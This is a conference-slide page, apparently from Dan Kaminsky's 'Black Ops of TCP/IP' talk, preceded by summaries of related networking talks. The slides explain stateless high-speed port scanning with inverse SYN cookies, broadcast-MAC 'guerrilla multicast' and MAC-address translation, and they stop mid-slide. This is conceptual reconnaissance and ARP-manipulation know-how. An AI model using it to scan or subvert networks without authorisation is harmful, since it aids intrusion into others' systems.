This document provides instructions for using OpenSSH to securely connect to remote systems and transfer files. It describes how to generate and use SSH keys for passwordless authentication, set up port forwarding to access systems through firewalls, use SSH for file transfers like SCP and rsync, and route SSH traffic through proxy servers or bastion hosts.
Bitcoin has some promising technical aspects but faces significant scalability issues that threaten its core properties over time. While it currently works as a decentralized system, the need to process vast amounts of data means nodes will consolidate into "supernodes" that effectively function like centralized banks. This transition would compromise Bitcoin's anonymity and censorship-resistance as identities become linked and certain transactions could be blocked. Overall Bitcoin shows innovation but may not retain its present security model if it aims to seriously compete with mainstream payment networks in transaction volume.
Simplified Networking and Troubleshooting for K-12 Teachers - webhostingguy
The document provides an overview of networking concepts and troubleshooting tips for K-12 teachers. It discusses common network topologies including star and backbone networks. It also describes network components like hubs, switches, routers and servers. Basic networking concepts such as the OSI model, TCP/IP, IP addressing, subnets, and DNS are explained. Finally, the document provides steps to troubleshoot common issues like no internet access, email problems, printing issues, and joining a domain.
This document discusses various network attacks such as sniffing, ARP spoofing, replay attacks, and man-in-the-middle attacks. It provides an overview of how these attacks work, such as how ARP spoofing can allow an attacker to intercept network traffic in a switched network and how replaying captured packets can trigger certain responses. It also recommends tools like tcpdump and Wireshark for sniffing networks and introduces defenses like monitoring and encryption.
The document summarizes the history and development of Ethernet and TCP/IP networking protocols. It describes how ARPANET originally used packet switching in the 1960s, the development of TCP and IP in the 1970s, and how Ethernet was implemented as a standard for local area networks. It also provides an overview of how IP, TCP and common applications like HTTP operate and interconnect across network layers.
This document provides an overview of IPv6 and how it addresses limitations in IPv4. IPv6 features a 128-bit address size allowing for more addresses compared to IPv4's 32-bit addresses. This growth is needed as IPv4 addresses are being depleted. IPv6 also supports mobility, security features like IPsec, and multicast and anycast addressing. While IPv4 uses Network Address Translation to work around its limited address space, IPv6 removes this need through its expanded addressing.
The document discusses internetworking and how to build an internet from the ground up. It describes how different networking technologies are interconnected through protocols like TCP/IP which allow communication across heterogeneous networks by smoothing out differences. Layered models and protocols are explained, including how packets are routed from one network to another through gateways and fragmented if needed to traverse networks with different maximum transmission units.
This document provides an overview of the TCP/IP protocol. It begins with an introduction to TCP and IP, explaining that TCP provides reliable, ordered delivery of data packets over the unreliable IP network layer. It then discusses key TCP concepts like the three-way handshake for connection establishment, ACK packets for reliability, and the sliding window mechanism for efficient data transfer through pipelining of packets. The document is intended to explain the core logic and functionality of the TCP protocol at a high level.
This document provides a summary of key topics in network security including IP addressing, IP spoofing, fragmentation, ICMP messages, and ways these can be abused or pose risks. Specific vulnerabilities discussed include ping flooding using spoofed source addresses for amplification attacks, overlapping IP fragments that can crash systems, and abusing ICMP unreachable messages to poison routing tables or disrupt connectivity. Safe practices like egress filtering and carefully handling fragmented packets are recommended.
The document discusses TCP/IP basics and networking concepts. It provides an overview of the OSI model and describes the layers from physical to application. It then focuses on the lower layers including Ethernet, IP addressing, ARP, and introduces TCP and UDP at the transport layer.
TCP/IP is a protocol suite that includes IP, TCP, and UDP. IP provides connectionless and unreliable delivery of datagrams between hosts. TCP provides reliable, connection-oriented byte stream delivery between processes using ports. UDP offers minimal datagram delivery between processes using ports in an unreliable manner. The choice between TCP and UDP depends on the application's requirements for reliability and overhead.
The document discusses networking basics, including common network terminology and protocols. It explains that networks use multiple layers of protocols, with applications like HTTP and FTP relying on lower level protocols like TCP and IP for transport and routing. It also describes key networking concepts such as IP addresses, DNS, subnets, private networks, and network devices like routers and servers.
This document provides a tutorial on network programming with Python. It begins with an overview of key network concepts like MAC addresses, IP addresses, ports, connectionless vs connection-oriented communication, and clients and servers. It then analyzes a sample client/server program written in Python to demonstrate how they communicate. It discusses the role of the operating system in managing connections and distinguishing between multiple simultaneous connections. Finally, it covers additional topics like sending lines of text over TCP connections and dealing with asynchronous network inputs.
This document provides an overview of Ethernet networking including:
1. Ethernet uses layers 1 and 2 of the OSI model and the Network Access layer of the TCP/IP model. It evolved from early LAN technologies and uses frames, MAC addressing, and CSMA/CD.
2. Switches avoid collisions by forwarding frames only to destination ports, improving performance over hubs. Higher bandwidth standards like Fast Ethernet and Gigabit Ethernet require full-duplex links without collisions.
3. Ethernet addressing uses MAC addresses to identify devices locally and IP addresses to route between networks. ARP resolves IP addresses to MAC addresses to allow communication between hosts.
This document provides information on networking topics in Linux including:
- How to connect to Linux systems using SSH and things that can be done from the Linux command line interface
- IP addressing and subnet masking
- Setting up networks and creating permanent network configuration files
- Network troubleshooting tools like traceroute, nmap, netstat
- Reasons why network software may not work like firewalls blocking ports or network speed issues
- An overview of VPNs versus proxy servers and how each works
VLANs logically segment networks to limit broadcast domains and improve performance. VLANs use tagging to associate packets with VLAN IDs and allow machines on different physical LAN segments to communicate logically as if on the same segment. Port security features on switches can limit access to ports by blocking unauthorized MAC addresses and alerting network managers of potential security issues.
This document summarizes the physical and data link layers that TCP/IP relies on. It describes how TCP/IP services are controlled by daemons like inetd. It then discusses the physical layer and different networking components like repeaters, bridges, switches, and routers. The rest of the document focuses on the data link layer, covering topics like data addressing, flow control, data integrity, frames, and common protocols like Ethernet, Token Ring, Serial Protocols, SLIP, and PPP.
The document discusses Ethernet and multiple access protocols. It covers:
- Ethernet uses CSMA/CD as its multiple access protocol to prevent collisions on shared channels.
- Bridges connect multiple Ethernet networks and use the spanning tree protocol to prevent loops while maintaining connectivity.
- Switches operate similarly to bridges but each port connects to a single device, allowing for full-duplex links.
The document discusses the functions of the transport layer in the OSI model. It explains that the transport layer accepts data from the session layer, breaks it into packets and delivers them to the network layer. It is responsible for guaranteeing successful arrival of data at the destination and provides end-to-end communication between source and destination transport layers. The transport layer separates upper layers from low-level data transmission details and handles any data loss or damage. It can transmit packets in the same order or as isolated messages depending on the network and protocol.
Dan Kaminsky gave a keynote talk at DEFCON China thanking the organizers. He discussed how bugs are not random and connected concepts that may seem unrelated. He explained how 60 frames per second for video originated from 1890s power grid technology running at 60Hz for induction motors, and how the human brain also operates around this frequency range. Spectre and Meltdown CPU bugs occurred because security boundaries were based on assumptions that timing variations did not carry information, but they can be exploited to leak bits of data. Kaminsky argued that development and testing teams should be more integrated to avoid such issues through a more holistic "engineering" approach rather than distinguishing "forward" from "reverse".
This document provides a technical summary of Dan Kaminsky's keynote presentation. The keynote discusses three main topics:
1) Denial of service attacks and how Overflowd aims to make DDoS attacks less annoying by sharing netflow data between networks.
2) Cryptography and how JFE (Jump to Full Encryption) aims to automate TLS deployment to make encryption easier.
3) Data loss prevention and how Ratelock restricts data loss by enforcing rate limits and other policies at the serverless cloud layer to increase survivability even if complex parts are compromised.
The document discusses chickens and their properties. It covers chicken taxonomy, different types of chickens and their characteristics. It also references several papers on chickens and their behaviors.
Black Ops of TCP/IP 2011 (Black Hat USA 2011) - Dan Kaminsky
The document summarizes vulnerabilities in TCP/IP protocols that can enable spoofing attacks and de-anonymization of Bitcoin transactions. It describes how:
1) UPnP vulnerabilities on home routers can expose nodes running Bitcoin clients to the public internet, allowing identification of IP addresses associated with transactions.
2) IP spoofing techniques can still bypass access control lists (ACLs) due to weaknesses in sequence number generation for TCP connections.
3) SYN cookies used to mitigate SYN floods have limited effectiveness and can be bypassed with a large number of connection attempts.
Showing How Security Has (And Hasn't) Improved, After Ten Years Of Trying - Dan Kaminsky
The document discusses the results of fuzz testing software from 2000-2010 to analyze how software security has improved over the last decade. The testing involved fuzzing four file formats (Office, PDF, etc.) across 18 programs from different years. This resulted in over 175,000 crashes. Analysis found over 900 unique bugs. Later versions had fewer exploitable bugs, indicating improving code quality. The results provide a potential "fuzzmark" metric for software security improvements, though comparisons across formats require more controls. The testing process and challenges ensuring data integrity are also outlined.
Domain Key Infrastructure (From Black Hat USA) - Dan Kaminsky
This document provides a summary of Dan Kaminsky's talk introducing the Domain Key Infrastructure (DKI). The talk is aimed at users, buyers, builders, and breakers. Kaminsky explains that DKI will allow easy authentication across organizational boundaries now that DNSSEC has been deployed, securing email and other services. He demonstrates how to easily set up DNSSEC with the Phreebird server and shows it working end-to-end. Kaminsky argues that DNSSEC implementations have improved and various companies now aim to make it easy to deploy through managed services and "one click" devices.
This document introduces Interpolique, a new approach to string interpolation that aims to prevent SQL injection and other injection attacks. It demonstrates how Interpolique works by rewriting inline SQL queries to use parameterized queries behind the scenes. Interpolique uses base64 encoding to safely pass variable data into queries. It allows developers to write queries inline while still protecting against injection. The goal is to let developers write code as they normally would but make injection attacks much harder to perform.
This document summarizes Dan Kaminsky's talk on rethinking web defense. Some key points:
1) Common web vulnerabilities like XSS and XSRF persist due to how difficult it is for developers to implement defenses like randomized tokens in a way that doesn't break other aspects of a site.
2) Web security solutions often ignore other engineering requirements around performance, compatibility, reliability and usability, making them difficult and expensive to implement.
3) Kaminsky argues the security community needs to develop defenses that meet all engineering requirements and don't break the web, rather than just criticizing developers. A secure session context could help prevent entire classes of vulnerabilities.
This document discusses vulnerabilities in the design of the Domain Name System (DNS) and how those vulnerabilities can be exploited. Specifically, it describes how DNS caches, proxies, and routes can be used to map DNS servers and inject content into caches. It also summarizes methods for tunneling arbitrary content through DNS using techniques like modifying Time-To-Live values and encoding data in domain names or record types. Finally, it discusses some approaches for suppressing DNS tunnels, such as flagging unusually large or formatted traffic.
This document discusses using audio visualization techniques to analyze audio files and detect patterns. It presents an approach called "dotplots" which compares chunks of audio data to find similarities. The document demonstrates a tool called "LudiVu" which uses dotplots to visualize similarities between sections of audio in real-time. It also discusses how dotplots could be useful for format identification, fuzzing guidance, and comparing versions of files and fuzzing operations. Overall, the document explores using dotplot visualization of audio as a way to analyze audio, detect repeated patterns, compare files, and potentially guide fuzzing activities.
Dan Kaminsky introduces the concept of DNS tunneling, which involves encoding and transmitting data within DNS queries and responses. He describes early implementations of DNS tunneling used to establish remote networking connections. Kaminsky then explores ways to increase bandwidth for DNS tunneling, such as encoding audio streams within DNS TXT records or distributing large files across many caching DNS servers in a technique called "DomainCast". Finally, he discusses modifying scanning tools to map the DNS landscape at large scales through stateless queries and analysis of responses.
This document discusses using OpenSSH to create secure tunnels through improbable networks. It covers:
1) Using SSH port forwarding to forward shells, commands, and ports between systems in a secure manner.
2) Implementing dynamic port forwarding with SOCKS to allow flexible connections.
3) Overcoming limitations of static port forwarding through techniques like SSH tunnels and proxy commands.
4) Creating secure remote access and inter-host connectivity even when systems are behind firewalls.
Weaknesses in authentication and encryption across many systems allowed significant security flaws to emerge in 2008, including issues with DNS, SSL, and SNMPv3. These flaws occurred because critical systems like DNS, which underlie authentication in many other areas, cannot reliably authenticate responses. Fixing these problems was challenging due to dependencies between systems and the complexity of coordinating updates. The speaker argues that securing DNS could help address authentication issues in linked systems by providing a secure, scalable place to publish cryptographic keys and other authentication data.
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an... - Jason Yip
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers - akankshawande
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
HCL Notes and Domino License Cost Reduction in the World of DLAU - panagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able to lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered:
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc.
- Practical examples and best practices to implement right away
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/how-axelera-ai-uses-digital-compute-in-memory-to-deliver-fast-and-energy-efficient-computer-vision-a-presentation-from-axelera-ai/
Bram Verhoef, Head of Machine Learning at Axelera AI, presents the “How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-efficient Computer Vision” tutorial at the May 2024 Embedded Vision Summit.
As artificial intelligence inference transitions from cloud environments to edge locations, computer vision applications achieve heightened responsiveness, reliability and privacy. This migration, however, introduces the challenge of operating within the stringent confines of resource constraints typical at the edge, including small form factors, low energy budgets and diminished memory and computational capacities. Axelera AI addresses these challenges through an innovative approach of performing digital computations within memory itself. This technique facilitates the realization of high-performance, energy-efficient and cost-effective computer vision capabilities at the thin and thick edge, extending the frontier of what is achievable with current technologies.
In this presentation, Verhoef unveils his company’s pioneering chip technology and demonstrates its capacity to deliver exceptional frames-per-second performance across a range of standard computer vision networks typical of applications in security, surveillance and the industrial sector. This shows that advanced computer vision can be accessible and efficient, even at the very edge of our technological ecosystem.
Fueling AI with Great Data with Airbyte Webinar - Zilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
Introduction of Cybersecurity with OSS at Code Europe 2024 - Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk - Fwdays
In this talk we will discuss DDoS protection tools and best practices, network architectures, and what AWS has to offer. We will also look into one of the largest DDoS attacks on Ukrainian infrastructure, which happened in February 2022. We'll see what techniques helped to keep the web resources available for Ukrainians and how AWS improved DDoS protection for all customers based on the Ukraine experience.
Taking AI to the Next Level in Manufacturing.pdf - ssuserfac0301
Read Taking AI to the Next Level in Manufacturing to gain insights on AI adoption in the manufacturing industry, such as:
1. How quickly AI is being implemented in manufacturing.
2. Which barriers stand in the way of AI adoption.
3. How data quality and governance form the backbone of AI.
4. Organizational processes and structures that may inhibit effective AI adoption.
6. Ideas and approaches to help build your organization's AI strategy.
Programming Foundation Models with DSPy - Meetup Slides - Zilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
How information systems are built or acquired puts information, which is what they should be about, in a secondary place. Our language adapted accordingly, and we no longer talk about information systems but applications. Applications evolved in a way to break data into diverse fragments, tightly coupled with applications and expensive to integrate. The result is technical debt, which is re-paid by taking even bigger "loans", resulting in an ever-increasing technical debt. Software engineering and procurement practices work in sync with market forces to maintain this trend. This talk demonstrates how natural this situation is. The question is: can something be done to reverse the trend?
Essentials of Automations: Exploring Attributes & Automation Parameters - Safe Software
Building automations in FME Flow can save time, money, and help businesses scale by eliminating data silos and providing data to stakeholders in real-time. One essential component to orchestrating complex automations is the use of attributes & automation parameters (both formerly known as “keys”). In fact, it’s unlikely you’ll ever build an Automation without using these components, but what exactly are they?
Attributes & automation parameters enable the automation author to pass data values from one automation component to the next. During this webinar, our FME Flow Specialists will cover leveraging the three types of these output attributes & parameters in FME Flow: Event, Custom, and Automation. As a bonus, they’ll also be making use of the Split-Merge Block functionality.
You’ll leave this webinar with a better understanding of how to maximize the potential of automations by making use of attributes & automation parameters, with the ultimate goal of setting your enterprise integration workflows up on autopilot.
Monitoring and Managing Anomaly Detection on OpenShift.pdfTosin Akinosho
Monitoring and Managing Anomaly Detection on OpenShift
Overview
Dive into the world of anomaly detection on edge devices with our comprehensive hands-on tutorial. This SlideShare presentation will guide you through the entire process, from data collection and model training to edge deployment and real-time monitoring. Perfect for those looking to implement robust anomaly detection systems on resource-constrained IoT/edge devices.
Key Topics Covered
1. Introduction to Anomaly Detection
- Understand the fundamentals of anomaly detection and its importance in identifying unusual behavior or failures in systems.
2. Understanding Edge (IoT)
- Learn about edge computing and IoT, and how they enable real-time data processing and decision-making at the source.
3. What is ArgoCD?
- Discover ArgoCD, a declarative, GitOps continuous delivery tool for Kubernetes, and its role in deploying applications on edge devices.
4. Deployment Using ArgoCD for Edge Devices
- Step-by-step guide on deploying anomaly detection models on edge devices using ArgoCD.
5. Introduction to Apache Kafka and S3
- Explore Apache Kafka for real-time data streaming and Amazon S3 for scalable storage solutions.
6. Viewing Kafka Messages in the Data Lake
- Learn how to view and analyze Kafka messages stored in a data lake for better insights.
7. What is Prometheus?
- Get to know Prometheus, an open-source monitoring and alerting toolkit, and its application in monitoring edge devices.
8. Monitoring Application Metrics with Prometheus
- Detailed instructions on setting up Prometheus to monitor the performance and health of your anomaly detection system.
9. What is Camel K?
- Introduction to Camel K, a lightweight integration framework built on Apache Camel, designed for Kubernetes.
10. Configuring Camel K Integrations for Data Pipelines
- Learn how to configure Camel K for seamless data pipeline integrations in your anomaly detection workflow.
11. What is a Jupyter Notebook?
- Overview of Jupyter Notebooks, an open-source web application for creating and sharing documents with live code, equations, visualizations, and narrative text.
12. Jupyter Notebooks with Code Examples
- Hands-on examples and code snippets in Jupyter Notebooks to help you implement and test anomaly detection models.
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
"Choosing proper type of scaling", Olena SyrotaFwdays
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
1. BLACK OPS OF TCP/IP
Spliced NAT2NAT And Other Packet-Level Misadventures
Dan Kaminsky, CISSP
DoxPara Research
www.doxpara.com
2. Where I’m Coming From…
Black Hat / DefCon 0x7D1
Impossible Tunnels through Improbable Networks
with OpenSSH
Getting Out:
ProxyCommands for Non-TCP comm layers
HTTP, SOCKS, UDP, Packet Radio*, AIM/Yahoo*
Coming In:
Active Connection Brokering for NAT2NAT
One host exports SSHD to broker
Other host imports access from broker
Passing Through:
Dynamic Forwarding for Pseudo-VPN Work
Web Browsing, Dialpad(Split-H323), etc.
3. Interesting Problems
Instant Portscan
“Is it possible to discover instantaneously what network
services have been made available, even on massive
networks?”
Guerrilla Multicast
“Is it possible to send a single packet to multiple
recipients, using today’s multicast-free Internet?”
“NATless NAT”
“Is it possible to share a globally addressable IP
address without translating private IP ranges a la NAT?”
Is it possible to allow incoming connections to an IP
multiplexed in this manner?
NAT Deadlock Resolution
“Is it possible to establish a TCP connection between
two hosts, both behind NATs?”
4. On Possibility
Restraint Free Engineering
“Abandon All Practicality, Ye Who Enter Here”
“It’s amazing what you can do once security is no
longer a concern.”
You’ve got what you’ve got. Make interesting
things happen.
It might end up practical.
It might end up secure.
Right now, it’s impossible. Fix that first.
Maybe.
5. On Packet Structure
Packets are “strangely ordered”
Where it’s ending up next, where it came from
recently, how it’s hopping from one place to the
next, how it’s hopping to its final destination,
checksum, where the packet came from originally,
where it’s going to end up, what app it came from,
what app it’s going to, checksum, god knows
what, ANOTHER checksum
Why not sort everything; put all the “came
from” and “going to’s” Why so much
redundancy? Isn’t it inefficient?
WHO CARES?
6. Layers: Not What, But Who
One medium, many messages
Listeners reconstruct meanings relevant to
themselves, ignore the rest
Managed (ir)responsibility
Fields are out of order, occasionally because
they’re addressed to different entities
Name and address repeated inside a business
letter and on the envelope
Messages at one layer can modulate
messages received at another
Insufficient postage will prevent a correctly
addressed letter from getting sent
Incorrect internal address has unknown effects
7. Error Recovery Per Layer
Layer 2 (Point to Point)
Errors are quickly recoverable, but error
generation can occur at same layer as layer
control
Data is destroyed and recreated each frame
Corporate Fertilizer
Layer 3 (Router to Router)
Many more sources of personally irrelevant error
Highest Traffic Link
Data is modulated – minimum change possible
Layer 4 (End to End)
Lowest traffic, highest personal relevance
Errors here actually matter
9. TCP Connection Traits: Flags
Connection Request (Alice -> Bob)
SYN: I want to talk to you
Connection Response (Bob -> Alice)
SYN|ACK: OK, let's talk.
RST|ACK: I ain’t listening
Connection Initiation (Alice -> Bob)
ACK: OK, beginning conversation.
10. TCP (and UDP)
Connection Traits: Ports
Local Port: What application requested the
connection. Usually a random number, 0-65535.
0 is a valid port
Remote Port: What application accepted the
connection. Usually a “known number”
80 for HTTP
143 for IMAP
443 for HTTP/SSL
IP handles who we’re talking to; Ports handle what
we want from them
11. TCP Connection Traits:
Sequences
Sequence Numbers
32 bit number, randomly generated, must
be reflected by the opposite party in a TCP
handshake
After initial reflection, used to relay
information about successful packet
acquisition
12. Connection Summary
Flag determines phase
Asymmetric
Port determines process
Sequence “secures session”
Prevents trivial spoofing attacks
Also used to manage connection speed,
identify which bytes are being
acknowledged
13. Stateless Pulse Scanning
Instant Portscan
“Is it possible to discover instantaneously what
network services have been made available, even
on massive networks?”
Answer: Yes, practically, even securely
Separate scanner and listener processes
Sending
Directly send n SYN packets
Same local port
SYN cookies
Receiving
Kernel filter packets arriving to local port
Record connection phase: Port up(SYN|ACK) or host
up, port down(RST|ACK)
14. Issue: Spoofed Responses
Easy to spoof hosts being up if the
scanner isn’t tracking who (or how it
scanned)
Solution: Invert SYN Cookies!
15. SYN Cookies
Developed in ’96, when SYN floods became
common
ACK reflects ACK# of SYN|ACK (incremented by one)
Encrypts connection state into the SYN|ACK’s
ACK#
Therefore, you can use legitimate remote hosts –
instead of kernel memory – to store handshake
state
Ahhh…but SYN|ACK also reflects SEQ# of
SYN in its ACK#…
Instead of tracking SYN|ACK reflections in the
ACK, track SYN reflections in the SYN|ACK
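To make the idea of slides 13 to 15 concrete, here is an added example (mine, not code from the talk or from Paketto Keiretsu) of the inverse SYN-cookie bookkeeping in Python: the scanner derives each SYN's SEQ# from a keyed hash of the target (IP, port), stores nothing, and the listener accepts a SYN|ACK or RST|ACK only if its ACK# equals that cookie plus one. The keyed hash (HMAC-SHA256 truncated to 32 bits, standing in for scanrand's trivial MD4), the secret, the addresses and the replies are all constructed for the example; nothing is put on the wire.

```python
import hashlib
import hmac
import ipaddress
import struct

# Per-run scanner secret. Constructed for this example; a real scanner
# would draw it at random every time it starts.
SECRET = b"example-scan-secret"


def syn_cookie(ip: str, port: int, secret: bytes = SECRET) -> int:
    """SEQ# for the SYN sent to (ip, port): a keyed hash of the target.

    HMAC-SHA256 truncated to 32 bits is an assumption made here, not the
    talk's exact construction (scanrand used MD4).
    """
    msg = ipaddress.ip_address(ip).packed + struct.pack("!H", port)
    tag = hmac.new(secret, msg, hashlib.sha256).digest()
    return struct.unpack("!I", tag[:4])[0]


def build_syn(dst_ip: str, dst_port: int, local_port: int = 40000) -> dict:
    """The outgoing probe. Nothing about it is remembered: the target's
    reply carries everything needed to validate it."""
    return {"dst_ip": dst_ip, "dst_port": dst_port, "sport": local_port,
            "flags": "SYN", "seq": syn_cookie(dst_ip, dst_port)}


def classify_reply(reply: dict, secret: bytes = SECRET) -> str:
    """Listener side: recompute the cookie from the reply's source (IP, port)
    and require ACK# == cookie + 1, as the handshake demands. A reply whose
    ACK# does not match was never provoked by our SYN and is ignored."""
    expected = (syn_cookie(reply["src_ip"], reply["src_port"], secret) + 1) & 0xFFFFFFFF
    if reply["ack"] != expected:
        return "spoofed"
    if reply["flags"] == "SYN|ACK":
        return "open"       # port up
    if reply["flags"] == "RST|ACK":
        return "closed"     # host up, port down
    return "other"


def make_reply(src_ip: str, src_port: int, flags: str, genuine: bool = True) -> dict:
    """Constructed replies for the demonstration. A genuine one echoes our
    SEQ# + 1; a forged one from a third party cannot, lacking the secret."""
    cookie = syn_cookie(src_ip, src_port)
    ack = (cookie + 1) & 0xFFFFFFFF if genuine else (cookie + 2) & 0xFFFFFFFF
    return {"src_ip": src_ip, "src_port": src_port, "flags": flags, "ack": ack}


def demo() -> dict:
    """Three constructed replies: one open port, one closed port, one forgery."""
    replies = {
        "open": make_reply("192.0.2.10", 80, "SYN|ACK"),
        "closed": make_reply("192.0.2.11", 22, "RST|ACK"),
        "spoofed": make_reply("192.0.2.12", 443, "SYN|ACK", genuine=False),
    }
    return {name: classify_reply(r) for name, r in replies.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:8s} -> {verdict}")
```

The defensive reading: a listener that validates replies this way cannot be fed fabricated "host up" results by a third party, which is exactly the spoofed-response problem of slide 14; and because the cookie is bound to the probed (IP, port), a genuine reply to some other probe does not validate either.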
16. Implementation: Scanrand 1.0
Element of: Paketto Keiretsu
384 lines of libnet and libpcap, w/ trivial
MD4 include
No state stored
Scans at ~11-20mbit
Possibly even portable
100% complete, release imminent
17.
18. Observed Results
Since no state is maintained within the
scanner, we can send SYNs at wire speed
Implementation can get faster
Found ~8300 web servers on a corporation’s
Class B
Time spent: ~4 Seconds
Collisions
Initial SYNs might collide, but SYN|ACKs resend
SYN|ACKs are given RSTs by present
kernels automatically
The SYNs were generated in userspace – the
kernel has no idea the connection request was
19. Implications
Userspace manipulation of packets can lead
to less overhead
Kernels are optimized to talk to other hosts, not
simply to scan them
Packet content can be overloaded
A random field can always be replaced with
encrypted data (and vice versa)
This is the heart of kleptography
Elegant solutions sometimes can be
reapplied elsewhere
SYN(really SYN|ACK) cookies made SYN
reception more efficient
Inverse SYN cookies make SYN transmission
20. Layer Redundancy
L2: Broadcast MAC Address
FF:FF:FF:FF:FF:FF
Absolute
L3: Broadcast IP Address
Last IP of Subnet
Relative
Sending to it is known as a Directed Broadcast
Often blocked, if it can be detected
Detection can be…suppressed.
21. Broadcast GHosts
Guerrilla Multicast
“Is it possible to send a single packet to multiple
recipients, using today’s multicast-free Internet?”
Answer: Yes, barely.
Link a unicast IP to a broadcast MAC
address; all responses to that IP will be
broadcast throughout a subnet
No individual client need duplicate the datastream
– the switch will issue copies of the data to all
downstream hosts
22. IP Incorporated
DHCP for an IP
May or may not use broadcast MAC in DHCP
request – just trying to validate that nobody else is
using the IP
Answer ARP requests for that IP with
Broadcast MAC (or Multicast MAC)
At L2, w/o IGMP Snooping working, Multicast =
Broadcast
Issue L4 requests against a remote host,
unicasted via layer 3, with responses
broadcasted locally at layer 2
Elegance has left the building
23. Firewall Issues
NAT
100% NAT penetration, as long as the
implementation doesn’t refuse to NAT for a
broadcast MAC
PIX, which accepts…Multicast MACs!
Multicast through NAT!
UDP
Remote side can send data forever – as long as it
keeps packets coming in before the UDP state
expires, no further data is required from behind the
wall
24. TCP w/ Guerrilla Multicast
Without any listeners, stream dies
With one listener, stream can operate
normally
With many listeners, only one should
participate in acknowledging the stream
If that one dies, another should take its place
Solution: Random delays
On reception of a packet to be acknowledged,
queue a response within the next 50-1500ms
Broadcast response
If another host broadcasted a response before you
had the chance to, unschedule your response
25. Recontextualizing L2/L3
One IP, normally linked to one host, can be
transformed at L2 into all hosts at a given
subnet
This transformation is undetectable outside the
subnet
Other Uses
“All hosts” could also include “Many hosts” using
L2 Multicast packets
Do we have any other situation where one IP
“stands in” for many hosts?
26. NAT: Splitting IPs For Fun
and Profit
NAT multiplexes several hosts into one IP
address by splitting on local port
Already munging IP, might as well munge ports
too
Some implementations make best efforts to match
local port inside the network w/ local port outside
Birthday Paradox: Collision chance = 1 /
sqrt(range_of_local_ports) = 1/256
If we can always match IP and Port, then we
can always maintain end-to-end correctness
Only have a problem 1/256 connections to the
same host
Alternate strategies exist – munge the SEQ# (problems
w/ Window overlap), MTU decrement, TIMESTAMPS
27. MAC Address Translation
“NATless NAT”
“Is it possible to share a globally addressable IP
address without translating private IP ranges a la
NAT?”
Is it possible to allow incoming connections to an
IP multiplexed in this manner?
Answer: Yes. Oh yes.
NAT: L4->L3
ARP: L3->L2
MAT: L4->(L3,L2)
Multiplex with L2/L3 instead of just L3
Make ARP Table dynamic, based on each individual L4
connection
Maintains L3 end-to-end integrity
28. Implementation: AllNewt 1.0
“All New Translation Engine”
Another part of Paketto Keiretsu
Translates arbitrary local IP addresses into
globally routable IP addresses
Instead of just storing IP_SRC, stores IP_SRC,
ETHER_DHOST, and ETHER_SHOST
If IP_SRC == External IP, packets will retain end-
